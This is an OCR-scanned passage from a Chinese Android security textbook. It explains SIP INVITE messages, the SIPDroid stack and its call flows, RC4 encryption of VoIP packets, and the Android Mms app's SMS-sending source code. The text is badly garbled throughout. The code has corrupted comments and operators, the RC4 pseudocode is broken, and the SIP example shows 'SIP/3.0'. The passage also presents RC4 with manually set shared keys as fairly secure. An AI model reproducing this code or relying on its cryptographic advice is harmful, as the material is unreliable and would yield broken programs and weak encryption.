册 服 务 器 记录 下 用 户 信息 。 不 过 注册 记录 是 有 有 效 期 的 ， 因 此 UAC 要 定时 发 送 REGISTER 请 求 刷新 


自己 的 位 置信 息 。 
-个 典型 的 SIP INVITE 请 求 消息 如 下 所 示 。 
INVITE sip:bob@aaa.com SIP/3.0 


Via: SIP/3.0/UDP pc3.aaa.com;branch 
Max-Forwards: 70 

To: Bob <sip:bob@aaa.com> 

From: Alice <sip:alice@aaa.com>;tag=192830 
Call-ID: 66710@pc3.aaa.com 

CSeq: 314159 INVITE 

Contact: <sip:alice@pc3.aaa.com> 
Content-Type: aaa/sdp 

Content-Length: 142 


上 述 信息 忽略 了 Alice 的 SDP 消息 体 。 消 息 第 一 行 是 请 求 的 类 型 (INVITE ) 。 接 下 来 是 请 求 头 域 集合 。 
VIA 域 包 含 了 Alice 接收 发 送 请 求 的 服务 器 地 址 (pce3.aaa.com) 以 及 一 个 标志 Alice 和 这 个 服务 器 会 话 事务 
的 分 支 参数 。TO 域 包含 了 显示 姓名 (Bob) 和 一 个 SIP URI (sip: bob@aaa.com) ， 请 求 将 首先 传输 到 这 个 
URI 中 。FROM 域 也 同样 包含 一 个 显示 姓名 (Alice) 、 一 个 用 来 标志 请 求 发 起 者 的 URI (sip:alice@aaa.com) 
以 及 用 于 身份 鉴别 的 TAG 随机 参数 。Call_ID 包含 一 个 全 局 标志 , 用 来 唯一 标识 这 个 呼叫 。 TO TAG. FROM 
TAG fll CALL-ID 完整 定义 了 Alice 和 Bob 端 到 端的 SIP 关系 。Cseq 包含 了 一 个 整数 和 一 个 请 求 名 字 , 新 请 
求 会 顺序 递增 这 个 整数 。Contact 域 包含 一 个 SIP URI 用 来 表示 访问 Alice 的 直接 方式 , 包括 用 户 名 和 主机 全 
名 组 成 。VIA 域 告 诉 其 他 元 素 请 求 将 发 送 到 哪里 并 且 应 答 到 哪里 ，Contract 域 则 表明 将 来 的 请 求 将 发 送 到 哪 
里 。Max-Forwards 表示 最 大 转发 数量 是 一 个 整数 ， 用 来 限制 通信 中 转发 的 数量 ， 每 转发 一 次 ， 整 数 减 1。 
Content type 包含 了 消息 正文 的 描述 。Content-length 包含 消息 正文 的 长 度 〈 字 节 数 ) 。 


7.3.4 在 Android 平台 实现 SIP 协议 栈 


要 开发 一 个 完整 的 SIP 协议 栈 是 一 件 相当 复杂 的 工程 , 所 以 希望 在 网 络 上 找到 开源 协议 栈 的 帮助 。 目 前 
SIP 开源 协议 栈 主 要 有 6 种 : OPAL. VOCAL. ѕірх. ReSlProcate. oSIP 和 SIPDroid， 各 有 千秋 ， 此 处 选择 
的 是 SIPDroid。 

SIPDroid 协议 栈 是 按照 RFC3261(SIP) 标 准 的 一 个 公开 源码 的 免费 协议 栈 , 可 以 应 用 于 任何 支持 POSIX 
的 系统 当中 ， 所 以 在 嵌入 式 系统 中 得 到 广泛 的 应 用 。SIPDroid 软件 架构 非常 先进 ， 高 内 聚 低 耦 合 ， 层 次 分 
明 ， 便 于 开发 者 自己 定制 新 功能 。SIPDroid 支持 接 入 方式 ， 包 括 WiFi、3G、EGPRS、 蓝 牙 。SIPDroid 协议 
栈 各 个 程序 框架 的 具体 说 明 如 下 所 示 。 

口 界面 层 : 用 于 显示 界面 ， 为 用 户 提供 各 种 操作 的 接口 。 

а 核心 层 : 即 软件 核心 处 理 层 ， 启动 服务 ,处 理 各 种 UI 时 间 , 维持 配置 文件 信息 , 保存 全 局 属性 变量 。 

其 中 包括 UserProfile (用 户 配 置 文件 属性 ) 、UserAgent (用 户 事件 代理 ) 、SipDroidEngine (SIP 
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核心 处 理 ， 调 度 所 有 的 UI 的 事件 ， 参 数 设 计 以 及 服务 的 启动 ) 、RegisterAgent (注册 服务 代理 ) 。 
会 话 层 : 负责 完成 会 话 邀请 、 来 电 的 业务 处 理 。 
服务 层 : 提供 所 有 SP 消息 模型 ， 完 成 SIP 消 息 的 处 理 流程 ， 包 括 发 送 、 接 收 、 封 装 、 解 码 等 。 
网 络 层 : 监听 SP 消息 并 且 交 付 给 SIP 层 ， 将 封装 好 的 SIP 消 息 交 付 给 传输 层 进行 传输 。 
传输 层 : 负责 数据 的 传输 与 控制 ， 采 用 了 TCP、UDP 协 议 。 
CL) 传输 信 令 数据 
用 户 在 UI 层 的 操作 《〈 例 如 拨号 、 接 听 等 ) 会 广播 给 SIPDroid Engine 类 ，SIPDroid Engine 会 根据 操作 
类 型 交付 给 UserAgent 类 或 者 RegisterAgent 类 ， 处 理 后 产生 的 不 同 请 求 由 SIPDroid Provide 类 解读 ， 并 将 产 
生 的 SIP 消息 封装 成 包 ， 之 后 交付 给 Udp Transport 类 ，Udp Transport 是 一 个 接口 类 ，SIPDroid Provider 与 
Udp Provider 之 间 的 接口 可 以 提供 数据 传送 ,监听 Udp 数据 包 和 封装 或 分 解 Udp 数据 包 等 服务 。Udp Provider 
会 调用 Udp Socket， 将 目标 地 址 映射 至 Udp Socket， 最 终 调 用 Java 的 Datagram Socket 将 数据 传输 出 去 。 当 
收 到 来 自 网 络 的 数据 包 时 ， 数 据 传递 顺序 则 相反 。 
(2) RTP 数据 包 的 传输 
RTP 数据 包 的 简要 传输 流程 是 ， 当 终端 把 采样 到 的 音频 数据 压缩 编码 后 需要 封装 成 RTP 包 传输 出 去 时 ,会 
先 建立 一 个 虚拟 的 RTP 传送 器 RTPStreamSender 和 一 个 用 于 接收 RTP 数据 包 的 虚拟 RTP 接收 器 
RTPStreamReceiver， 二 者 继承 于 线程 ,在 对 话 建立 后 就 不 断 运 行 。 RTPStreamSender 会 把 音频 数据 压缩 编码 后 交 
付 UDPtransport (或 TCPtransport) 处 理 ，UDPtransport 之 后 会 调用 RTPSocket 将 其 封装 成 RTP 包 ， 读 取 目 标 卫 
地 址 与 协商 好 的 RTP 端口 号 ， 将 数据 传输 出 去 。 当 收 到 来 自 网 络 的 RTP 数据 包 时 ， 数 据 传递 顺序 则 相反 。 
(3) SIPDroid 注册 流程 
根据 SIP 协议 内 容 ， 在 以 下 儿 种 情况 之 下 需要 重新 发 送 注册 请 求 。 
口 启动 SIP 服 务 时 、 注 册 有 效 期 已 过 、 系 统 重启 、 有 效 连 接 断 开 重 连 。 
Па 当 需 要 发 送 注册 请 求 消息 时 ， 要 先 调 用 MessageFactory.createRegisterRequest 函 数 构建 请 求 消息 ， 将 
用 户 账号 信息 、 注 册 服 务 器 地 址 等 必要 信息 填充 进 请 求 消 息 的 各 字段 , 然后 建立 一 个 用 来 监管 本 次 
信 令 流程 的 线程 TransactionClient。TransactionClient 会 调用 SIPProvider 来 发 送 请 求 消息 ， 同 时 会 监 
听 注 册 服务 器 的 响应 消息 。 当 收 到 响应 消息 后 ， 将 响应 消息 传递 给 上 层 的 SIPProvider 进 行 处 理 。 
(4) 拨号 流程 
拨号 请 求 由 UI 通过 Receiver 广播 信息 交 给 SIPDroidEngine 处 理 , 在 SIPDroidEngine 上 鉴别 目标 账号 以 及 本 
地 账号 是 否 为 空 ， 然 后 交 给 UserAgent 处 理 。UserAgent 调用 call (String target_url,boolean send anonymous) 判 
断 是 否 匿名 拨号 , 接着 通过 该 方法 创建 一 个 ExtendedCall 对 象 , 以 提供 给 SIP 协议 栈 使 用 , 然后 经 过 ExtendedCall 
的 call0 方 法 处 理 之 后 ， ExtendedCall 调用 ExtendedInviteDialog 来 发 送 Invite 请 求 。 由 InviteDialog 调用 
InviteTransactionClient 的 request() 方 法 ， 并 由 InviteTransactiongClient 来 监管 本 次 信 令 流程 。 
(5) 来 电 处 理 流程 
启动 程序 时 SIPDroidEngine 创建 并 启动 一 个 UdpProvider 线程 ， 开 始 监听 收 到 的 信息 ， 当 收 到 信息 后 ， 
先 判断 消息 是 否 大 于 最 小 长 度 (默认 为 0) ， 如 果 不 是 则 丢弃 ， 之 后 调用 onReceivedPacket() 方 法 ， 把 对 象 
传 出 到 UdpTransport， 由 UdpTransport 把 消息 封装 成 SIP 的 扩展 消息 Message， 再 通过 onReceivedPacket() 
方法 传 出 到 SIPProvider 对 象 ， 最 后 将 在 SIPProvider 的 processReceivedMessage() 方 法 中 处 理 收 到 的 消息 。 
processReceivedMessage() 会 鉴定 该 消息 是 否 为 SIP 消息 ， 若 不 是 就 会 丢弃 该 消息 ， 然 后 通过 查看 Via 字段 的 
地 址 与 数据 报 源 地 址 是 否 一 致 来 判断 该 SIP 消息 是 否 经 过 其 他 代理 服务 器 转发 。 如 果 是 ， 则 修改 Via 字段 ， 
这 样 就 可 以 优化 寻 址 路 径 。 最 后 从 listeners (map) 中 取出 相应 的 listener， 通 过 响应 listener 中 的 
OnReceivedMessage 来 处 理 具体 SIP 请 求 。 如 果 是 Invite 请 求 ， 就 启动 来 电 提示 界面 ， 如 果 本 地 用 户 选择 接 
听 ， 就 发 送 请 求 接受 响应 ， 即 200 Cok) 响应 ， 若 用 户 不 愿 接听 ， 则 发 送 4xx 错误 响应 。 
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7.3.5 通话 加 密 技 术 


出 于 加 密 成 本 等 方面 因素 的 考虑 ， 此 处 选择 的 加 密 算 法 是 RC4 流 密码 ， 该 算法 简洁 易于 软件 实现 ， 加 
密 速度 快 ， 安 全 性 比较 高 。RC4 算法 非常 简单 ， 具 体 描 述 是 : 用 从 1 一 256 AEI (8—2048 位 ) 的 可 变 长 
度 密 钥 初 始 化 一 个 256 个 字 节 的 状态 矢量 S, S 的 元 素 记 为 S[0]，S[1]，…，S[255]， 从 始 至 终 置 换 后 的 S 
包含 从 0—255 的 所 有 8 比特 数 。 对 于 加 密 和 解密 ， 字 节 K H S 中 256 个 元 素 按 一 定 方式 选 出 一 个 元 素 而 生 
成 。 每 生成 一 个 K 的 值 ，S 中 的 元 素 就 被 重新 置换 一 次 。 
CD 初始 化 S 
开始 时 ，S 中 元 素 的 值 被 置 为 按 升 序 从 0 一 255， 即 S[0]=0，S[1]=1，…，S[255]=255， 同 时 建立 一 个 临 
KRET, WRH К 的 长 度 为 256 字 节 ， 则 将 K 赋 给 T， 否 则 ， 若 密 钥 长 度 为 keylen FW, WK K 的 值 
ат THT keylen 个 元 素 ， 并 循环 重复 用 K 的 值 赋 给 T 剩 下 的 元 素 ,， 直到 T 的 所 有 元 素 都 被 赋值 。 这 些 预 
操作 可 概括 如 下 。 
广 初始 化 */ 
fori=0 to 255 do 
S[i]=i; 
T[iJ=K[i mod keylen] 
WEH TE S 的 初始 置换 。 从 S[O]~S[255], AES Sli], HE 工 [确定 的 方案 ， 将 S 自 置换 为 S 
中 的 另 一 字 节 。 
"5 的 初始 序列 */ 
j=0 
for i=O to 255 do 
j=(j+s[il+ TIi)mod 256 
swap(s[i], =): 
因为 对 S 的 操作 仅 是 交换 ， 所 以 唯一 的 改变 就 是 置换 。S 仍然 包含 所 有 值 为 0 一 255 的 元 素 。 
(2) 生成 密 钥 流 
矢量 S 一 旦 完成 初始 化 ， 输 入 密 钥 就 不 再 被 使 用 。 密 钥 流 的 生成 是 从 S[0] 一 S[255]， 对 每 个 Spi], MUR 
当前 S 的 值 ， 将 STS s 中 的 另 一 字 节 置换 。 当 S[255] 完 成 置换 后 ， 操 作 继 续 重 复 ， 从 S[0] 开 始 。 
/* 密 钥 流 的 产生 */ 
i, j=0 
while(true) 
i-(i*1)mod 256 
j=(+S[il)mod 256 
swap(s[Ei], s[j]) 
t=(s[Ei]+s[j])mod 256; 
k-S[t] 
在 加 密 过 程 中 将 k 的 值 与 下 一 明文 字 节 异 或 ， 在 解密 过 程 中 将 k 的 值 与 下 一 密 文字 节 异 或 。 
(3) 改写 SIPDroid 的 UDP 收发 函数 
通过 研究 SIPDroid 的 源 代码 ， 发 现 SIPDroid 在 对 UDP 消息 进行 封装 时 是 将 语音 信息 编码 为 BYTE 类 
型 处 理 的 ， 因 此 选择 不 改变 信 令 协议 栈 和 媒体 传输 协议 栈 的 任何 实现 代码 ， 仅 仅 只 是 将 RC4 算法 模块 封装 
成 为 src 中 的 一 个 包 , 改写 了 系统 的 UDP 收发 函数 , 使 其 在 对 诸 音 编码 信息 封装 前 先 调用 RC4 算法 进行 加 密 ， 
再 将 加 密 后 的 密 文 打包 。 在 解密 时 则 进行 相反 的 过 程 。 由 于 RC4 是 对 称 加 密 ， 因 此 加 解密 使 用 同一 个 密 钥 。 
考虑 到 如 果 将 密 钥 采用 明文 传输 ， 则 讨论 本 套 语音 加 密 系统 的 安全 性 将 毫 无 意义 ， 而 如 果 采 用 非 对 称 加 密 如 
RSA 来 传递 密 钥 ， 需 要 的 加 密 成 本 太 高 ， 因 此 选择 了 客户 端 自己 设置 加 密 密 钥 或 者 解密 密 钥 的 方案 。 
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对 于 Android 手机 设备 来 说 ， 除 了 拨打 电话 之 外 ， 还 有 一 种 比较 重要 的 数据 通信 方式 : 短信 。 在 实现 短 
信 收 发 功能 的 过 程 中 ，Android 需要 确保 这 些 信 息 的 安全 性 。 本 章 将 详细 讲解 Android 系统 实现 短信 系统 安 
全 的 基本 知识 ， 为 读者 学 习 本 书后 面 的 知识 打下 基础 。 


8.1 Android 短信 系统 详解 


Фи 知识 点 讲解 : 光盘 :视频 \ 知 识 点 \ 第 8 章 \Android 短信 系统 详解 .avi 
在 Android 系统 中 ， 应 用 程序 通过 文件 SmsManagerjava 实现 发 送 短信 功能 。 在 本 节 的 内 容 中 ， 将 首先 
详细 讲解 Android 短信 系统 的 基本 知识 。 


8.1.1 短信 系统 的 主 界面 


在 Android 系统 中 发 送 短信 时 ， 首 先 来 到 发 送 短信 界面 ， 默 认 主 界面 是 通过 文件 packages/apps/ 
Mms/src/com/android/mms/uiConversationListjava 实现 的 ， 在 此 文件 中 首先 会 监听 onListltemClick 事件 ， 有 具 
体 代 码 如 下 所 示 。 

protected void onListltemClick(ListView 1, View v, int position, long id) ( 

Cursor cursor = (Cursor) getListView().getltemAtPosition(position); 
Conversation conv = Conversation.from(this, cursor); 
long tid = conv.getThreadld(); 


if (LogTag. VERBOSE) ( 
Log.d(TAG, "onListltemClick: pos=" + position +", viewz" + v +", tid=" + tid); 
} 


openThread(tid); 


} 
在 上 述 代 码 中 ， 如 果 position 为 0， 则 调用 函数 createNewMessage() 新 建 一 个 短信 ， 具 体 代码 如 下 所 示 。 
private void createNewMessage() ( 

startActivity(ComposeMessageActivity.createIntent(this, 0)); 


} 
在 文件 中 ， 根 据 用 户 在 主 界面 的 选项 可 以 调用 对 应 的 函数 实现 对 应 的 功能 ， 例 如 ， 新 建 短信 选项 、 删 
除 回话 选项 等 。 这 个 功能 是 通过 onOptionsItemSelected() 实 现 的 ， 具 体 代码 如 下 所 示 。 
public boolean onOptionsltemSelected(Menultem item) ( 
switch(item.getltemld()) { 
case R.id.action compose new: 
createNewMessage(); 
break; 
case R.id.action_delete_all: 
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11 The invalid threadld of -1 means all threads here 
confirmDeleteThread(-1L, mQueryHandler); 
break; 
case R.id.action settings: 
Intent intent = new Intent(this, MessagingPreferenceActivity.class); 
startActivitylfNeeded(intent, -1); 
break; 
case R.id.action debug dump: 
LogTag.dumpInternalTables(this); 
break; 
case R.id.action cell broadcasts: 
Intent cellBroadcastintent = new Intent(Intent. ACTION MAIN); 
cellBroadcastintent.setComponent(new ComponentName( 
"com.android.cellbroadcastreceiver", 
"com.android.cellbroadcastreceiver.CellBroadcastListActivity") ; 
cellBroadcastintent.setFlags(Intent.FLAG ACTIVITY NEW TASK); 
try{ 
startActivity(cellBroadcastIntent); 
} catch (ActivityNotFoundException ignored) { 
Log.e(TAG, "ActivityNotFoundException for CellBroadcastListActivity"); 
} 
return true; 
default: 
return true; 


return false; 
) 
函数 createNewMessage() 的 功能 是 设置 程序 来 到 一 个 新 的 界面 startActivity， 即 来 到 文件 packages/apps/ 
Mms/src/com/android/mms/ComposeMessageActivity.java, 在 此 文件 中 首先 会 监听 用 户 是 否 单 击 “ 发 送 ” 按 钮 ， 
具体 实现 代码 如 下 所 示 。 
public void onClick(View v) ( 
if ((v == mSendButtonSms || v == mSendButtonMms) && isPreparedForSending()) ( 
confirmSendMessagelfNeeded(); 
} else if ((v == mRecipientsPicker)) ( 
launchMultiplePhonePicker(); 
) 
) 
如 果 单 击 了 “发 送 ”按钮 ， 则 调用 函数 confirmSendMessagelfNeeded0 进 行 再 次 判断 ， 以 确定 是 否 发 送 
信息 。 具 体 实现 代码 如 下 所 示 。 
private void confirmSendMessagelfNeeded() ( 
if (lisRecipientsEditorVisible()) { 
sendMessage(true); 
return; 


} 


boolean isMms = mWorkingMessage.requiresMms(); 
if (mRecipientsEditor.hasInvalidRecipient(isMms)) { 
if (mRecipientsEditor.hasValidRecipient(isMms)) { 
String title = getResourcesString(R.string.has_invalid_recipient, 
mRecipientsEditor.formatinvalidNumbers(isMms)); 
new AlertDialog.Builder(this) 
-setTitle(title) 
.setMessage(R.string.invalid recipient message) 
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.setPositiveButton(R.string.try_to_send, 
new SendlgnorelnvalidRecipientListener()) 
-setNegativeButton(R.string.no, new CancelSendingListener()) 
-show(); 
) else { 
new AlertDialog.Builder(this) 
.setTitle(R.string.cannot send message) 
.setMessage(R.string.cannot send message reason) 
.setPositiveButton(R.string.yes, new CancelSendingListener()) 
.show(); 
} 
}else { 
11 The recipients editor is still open. Make sure we use what's showing there 
11 as the destination 
ContactList contacts = mRecipientsEditor.constructContactsFromInput(false); 
mDebugRecipients = contacts.serialize(); 


sendMessage(true); 
} 
} 
经 过 上 述 再 次 确认 后 ， 如 果 确 认 发 送 则 调用 函数 sendMessage0 发 送 当 前 新 建 的 短信 ， 具 体 实现 代码 如 
下 所 示 。 
private void sendMessage(boolean bCheckEcmMode) ( 
if (bCheckEcmMode) { 
/| TODO: expose this in telephony layer for SDK build 
String inEcm = SystemProperties.get(TelephonyProperties. PROPERTY INECM MODE); 
if (Boolean.parseBoolean(inEcm)) ( 
try( 
startActivityForResult( 
new Intent(Telephonylntents.ACTION SHOW NOTICE ЕСМ BLOCK OTHERS, null), 
REQUEST CODE ECM EXIT DIALOG); 
return; 
} catch (Activity NotFoundException e) { 
// continue to send message 
Log.e(TAG, "Cannot find EmergencyCallbackModeExitDialog", e); 
) 
) 
) 
if (ImSendingMessage) ( 
if (LogTag.SEVERE WARNING) ( 
String sendingRecipients = mConversation.getRecipients().serialize(); 
if (IsendingRecipients.equals(mDebugRecipients)) { 
String workingRecipients = mWorkingMessage.getWorkingRecipients(); 
if ImDebugRecipients.equals(workingRecipients)) { 
LogTag.warnPossibleRecipientMismatch("ComposeMessageActivity.sendMessage" + 
"recipients in window: Y" + 
mDebugRecipients + "V" differ from recipients from conv: V" + 
sendingRecipients + "\" and working recipients: " + 
workingRecipients, this); 
H 
sanityCheckConversation(); 
} 


11 send can change the recipients. Make sure we remove the listeners first and then add them back 
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once the recipient list has settled. 
removeRecipientsL isteners(); 


mWorkingMessage.send(mDebugRecipients);//mDebugRecipients 是 指 同步 得 到 的 全 部 收 件 人 , 以 分 号 间隔 
mSentMessage = true; 
mSendingMessage = true; 
addRecipientsListeners();/ 重 新 添加 对 收 件 人 的 监听 
mScrollOnSend = true; //іп the next onQueryComplete, scroll the list to the end 
} 
// But bail out if we are supposed to exit after the message is sent 


if (mSendDiscreetMode) { 
finish()/ 信 息 发 送 完成 后 ， 退 出 Activity 


) 

在 上 述 代 码 中 ， 如 果 当 前 默认 的 SIM 卡 有 效 ， 则 用 当前 的 SIM 卡 发 送 ， 否 则 进入 选择 SIM 卡 对 话 框 。 如 
果 SIM 卡 有 效 ， 则 首先 设置 当前 的 SIM 卡 ， 然 后 通过 函数 removeRecipientsListeners0) 取 消 对 收 件 人 的 监听 。 
8.1.2 发送 普通 短信 的 过 程 

这 里 的 普通 短信 是 相对 于 彩信 来 说 的 ， 在 Android 系统 中 ， 发 送 短信 的 流程 如 图 8-1 所 示 。 


图 8-1 发 送 短信 的 流程 
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接着 本 章 前 面 介绍 的 流程 。 在 调用 函数 sendMessage() 发 送 当 前 新 建 的 短信 之 前 ， 需 要 对 当前 短信 的 类 
型 进行 判断 ， 如 果 是 彩信 则 调用 sendMmsWork0 进 行 处 理 。 如 果 是 普通 短信 ， 则 调用 preSendSmsWorker() 
进行 处 理 。 在 接 下 来 的 内 容 中 ， 将 首先 讲解 在 Android 系统 中 发 送 普 通 短 信 的 基本 流程 。 
首先 在 文件 packages/apps/Mms/src/com/android/mms/data/WorkingMessage.java 中 ,通过 函数 preSendSms 
Worker0 来 发 送信 息 ， 具 体 实现 代码 如 下 所 示 。 
private void preSendSmsWorker(Conversation conv, String msgText, String recipientsInUI) { 
/发 送 一 个 广播 ， 说 明 当 前 的 内 容 是 用 户 想 要 的 内 容 
UserHappinessSignals.userAcceptedimeText(mActivity); 
/IComposeMessageActivity. onPreMessageSent-» resetMessage 用 于 重 置 一 些 信息 , 例如 清空 输入 内 容 框 、 
一 些 监听 等 
mStatusListener.onPreMessageSent(); 


long origThreadld = conv.getThreadld(); 


/如果 当 前 会 话 ID 和 0， 新 建 会 话 ID 
long threadld = conv.ensureThreadld(); 


String semiSepRecipients = conv.getRecipients().serialize(); 


// recipientsInUI can be empty when the user types in a number and hits send 
if(LogTag.SEVERE WARNING && ((origThreadld != 0 && origThreadld != threadld) || 
(IsemiSepRecipients.equals(recipientsInUI) && !TextUtils.isEmpty(recipientsInUI)))) { 
String msg = origThreadld != 0 && origThreadld != threadld ? 
"WorkingMessage.preSendSmsWorker threadld changed or " + 
"recipients changed. origThreadld: "+ 
origThreadld + " new threadld: " + threadld + 
"also mConversation.getThreadld(): " + 
mConversation.getThreadld() 


"Recipients in window: V" + 
recipientsInUI + "\" differ from recipients from conv: Y" + 
semiSepRecipients + "\""; 


LogTag.warnPossibleRecipientMismatch(msg, mActivity); 
} 


11 just do a regular send. We're already on a non-ui thread so no need to fire 
/发 送信 息 
sendSmsWorker(msgText, semiSepRecipients, threadld); 


/可 能 此 对 话 被 存在 了 草稿 中 ， 所 以 在 发 送 后 需要 删除 
deleteDraftSmsMessage(threadld); 
} 
在 上 述 代码 中 ， 调 用 函数 sendSmsWorker0 来 发 送信 息 ， 具 体 实现 代码 如 下 所 示 。 
private void sendSmsWorker(String msgText, String semiSepRecipients, long threadld) { 
String[ ] dests = TextUtils.split(semiSepRecipients, ";");// 通 过 分 号 ， 分 开 收 件 人 
if (LogTag.VERBOSE || Log.isLoggable(LogTag.TRANSACTION, Log.VERBOSE)) { 
Log.d(LogTag.TRANSACTION, "sendSmsWorker sending message: recipients=" + 
e 


semiSepRecipients + ", threadld=" + threadld); 


) 
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} 
MessageSender sender = new SmsMessageSender(mActivity, dests, msgText, threadld); 


try( 
sender.sendMessage(threadld); /根据 ThreadID 发 送 短信 


/删除 旧 的 消息 ， 检 查 限 制 
Recycler.getSmsRecycler().deleteOldMessagesByThreadld(mActivity, threadld); 
) catch (Exception e) ( 
Log.e(TAG, "Failed to send SMS message, threadld=" + threadld, e); 
} 


mStatusListener.onMessageSent();// 回 调 接口 ， 在 发 送信 息 时 调用 此 函数 
MmsWidgetProvider.notifyDatasetChanged(mActivity); 


在 上 述 代码 中 ， 调 用 了 文件 packages/apps/Mms/src/com/android/mms/transaction/SmsMessageSender.java 
中 的 函数 sendMessage() 发 送 短 信 并 实现 广播 。 具 体 实 现代 码 如 下 所 示 。 
public boolean sendMessage(long token) throws MmsException { 


} 


return queueMessage(token); 


在 上 述 代码 中 ， 是 通过 调用 函数 queueMessage0 实 现 真 正 的 发 送 功能 的 ， 具 体 实现 代码 如 下 所 示 。 


private boolean queueMessage(long token) throws MmsException ( 


if ((mMessageText == null) || (mNumberOfDests == 0)) { 
11 Don't try to send an empty message 
throw new MmsException("Null message body or dest."); 


) 
// 得 到 发 送 报告 设置 状态 


SharedPreferences prefs = PreferenceManager.getDefaultSharedPreferences(mContext); 
boolean requestDeliveryReport = prefs.getBoolean( 
MessagingPreferenceActivity.SMS DELIVERY REPORT MODE, 
DEFAULT DELIVERY REPORT MODE); 


/queueMessage 把 消息 按照 收 件 人 拆 开 成 多 条 消息 ， 并 且 都 加 入 发 送 队 列 


for (int i = 0; i < mNumberOfDests; i++) { 
try{ 
if (LogTag.DEBUG_SEND) ( 
Log.v(TAG, "queueMessage mDests[i]: " + mDests[i] + " mThreadld: " + mThreadld); 
ї 
Sms.addMessageToUri(mContext.getContentResolver(), 
Uri.parse("content://sms/queued"), mDests[i], 
mMessageText, null, mTimestamp, 
true /* read */, 
requestDeliveryReport, 
mrThreadld); 
) catch (SQLiteException e) ( 
if (LogTag.DEBUG SEND) { 
Log.e(TAG, "queueMessage SQLiteException", e); 
È 
SqliteWrapper.checkSQLiteException(mContext, e); 
1 


} 
/发 送 广播 给 SmsReceiver 
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mContext.sendBroadcast(new Intent(SmsReceiverService.ACTION SEND MESSAGE, 
null, 
mContext, 
SmsReceiver.class)); 

return false; 


} 
在 上 述 代 码 中 ， 如 下 代码 行 的 功能 是 发 送 广播 给 SmsReceiver. 
mContext.sendBroadcast(new Intent(SmsReceiverService.ACTION SEND MESSAGE, 
null, 
mContext, 
SmsReceiver.class)); 
上 述 广播 功能 是 通过 文件 packages/apps/Mms/src/com/android/mms/transaction/SmsReceiver.java 实现 的 ， 
主要 实现 代码 如 下 所 示 。 
public class SmsReceiver extends BroadcastReceiver { 
static final Object mStartingServiceSync = new Object(); 
static PowerManager.WakeLock mStartingService; 
private static SmsReceiver slnstance; 
public static SmsReceiver getlnstance() ( 
if (slnstance == null) ( 
slnstance = new SmsReceiver(); 


} 

return sInstance; 
} 
@Override 


public void onReceive(Context context, Intent intent) { 
onReceiveWithPrivilege(context, intent, false); 
} 
protected void onReceiveWithPrivilege(Context context, Intent intent, boolean privileged) { 
if (!privileged && intent.getAction().equals(Intents.S$MS RECEIVED ACTION)) { 
return; 
) 
intent.setClass(context, SmsReceiverService.class ); 
intent.putExtra("result", getResultCode()); 
beginStartingService(context, intent); 
) 
public static void beginStartingService(Context context, Intent intent) ( 
synchronized (mStartingServiceSync) ( 
if (mStartingService == null) ( 
PowerManager pm = 
(PowerManager)context.getSystemService(Context.POWER SERVICE); 
mStartingService = pm.newWakeLock(PowerManager.PARTIAL WAKE LOCK, 
"StartingAlertService"); 
mStartingService.setReferenceCounted(false); 
К 
mStartingService.acquire(); 
context.startService(intent); 
} 
} 
public static void finishStartingService(Service service, int startld) { 


synchronized (mStartingServiceSync) ( 
e. 
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if (mStartingService != null) ( 
if (service.stopSelfResult(startld)) { 
mStartingService.release(); 
H 


} 
} 


} 
在 上 述 代码 中 ， 当 类 SmsReceiver 的 onReceive 收 到 此 广播 后 会 启动 服务 SmsReceiverService， 此 服务 
在 文件 packages/apps/Mms/src/com/android/mms/transaction/SmsReceiverService.java 中 实现 ， 此 文件 是 SMS 
处 理 的 Service， 负 责 短信 的 发 送 和 接收 功能 。 具 体 实现 代码 如 下 所 示 。 
public void handleMessage(Message msg) ( 
int serviceld = msg.arg1; 
Intent intent = (Intent)msg.obj; 
if (Log.isLoggable(LogTag. TRANSACTION, Log.VERBOSE)) ( 
Log.v(TAG, "handleMessage serviceld: " + serviceld + " intent: " + intent); 


) 
if (intent != null) ( 
String action = intent.getAction(); 


int error = intent.getIntExtra("errorCode", 0); 


if (Log.isLoggable(LogTag. TRANSACTION, Log. VERBOSE)) { 
Log.v(TAG, "handleMessage action: " + action + " error: " + error); 


} 


if(MESSAGE SENT ACTION.equals(intent.getAction())) { 
handleSmsSent(intent, error); 
} else if (SMS RECEIVED ACTION.equals(action)) ( 
handleSmsReceived(intent, error); 
} else if (ACTION BOOT COMPLETED.equals(action)) { 
handleBootCompleted(); 
} else if (TelephonyIntents.ACTION SERVICE STATE CHANGED.equals(action)) { 
handleServiceStateChanged(intent); 
} else if (ACTION_SEND_MESSAGE.endsWith(action)) { 
handleSendMessage(); 
} else if (ACTION _SEND_INACTIVE_MESSAGE.equals(action)) { 
handleSendlnactiveMessage(); 
y 
H 
I| NOTE: We MUST not call stopSelf() directly, since we need to 
II make sure the wake lock acquired by AlertReceiver is released 
SmsReceiver.finishStartingService(SmsReceiverService.this, serviceld); 
} 
在 上 述 代码 中 ， 当 得 到 发 送 短信 的 指令 ACTION SEND MESSAGE 后 执行 函数 handleSendMessage(), 
具体 实现 代码 如 下 所 示 。 
private void handleSendMessage() ( 
if (ImSending) ( 
sendFirstQueuedMessage(); 


) 
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在 上 述 代码 中 ， 调 用 函数 sendFirstQueuedMessage() 查 询 队 列 中 的 信息 ， 包 括 上 次 没有 发 送出 去 存放 在 
发 送 队列 中 的 信息 ， 取 出 队列 中 的 第 一 条 消息 后 进行 发 送 。 函 数 sendFirstQueuedMessage0 的 具体 实现 代码 
如 下 所 示 。 

public synchronized void sendFirstQueuedMessage() ( 


boolean success - true; 
// get all the queued messages from the database 
final Uri uri = Uri.parse("content://sms/queued"); 
ContentResolver resolver = getContentResolver(); 
Cursor c = SqliteWrapper.query(this, resolver, uri, 
SEND PROJECTION, null, null, "date ASC"); 11 date ASC so we send out in 
// same order the user tried 
II to send messages. 
if (c != null) ( 
try( 
if (c. moveToFirst()) ( 
String msgText 7 c.getString(SEND COLUMN BODY); 
String address = c.getString(SEND COLUMN ADDRESS); 
int threadld = c.getn(SEND COLUMN THREAD 10); 
int status = c.getln(SEND COLUMN STATUS); 


int msgld = c.getlIn(SEND COLUMN 10); 
Uri msgUri 7 ContentUris.withAppendedld(Sms.CONTENT URI, msgld); 


SmsMessageSender sender = new SmsSingleRecipientSender(this, 
address, msgText, threadld, status == Sms.STATUS PENDING, 
msgUri); 


if (LogTag.DEBUG_SEND || 
LogTag. VERBOSE || 
Log.isLoggable(LogTag. TRANSACTION, Log. VERBOSE)) { 
Log.v(TAG, "sendFirstQueuedMessage " + msgUri + 
", address: " + address + 
^; threadld: " + threadld); 


) 


try { 
sender.sendMessage(SendingProgress TokenManager.NO_TOKEN);; 
mSending = true; 
} catch (MmsException e) { 
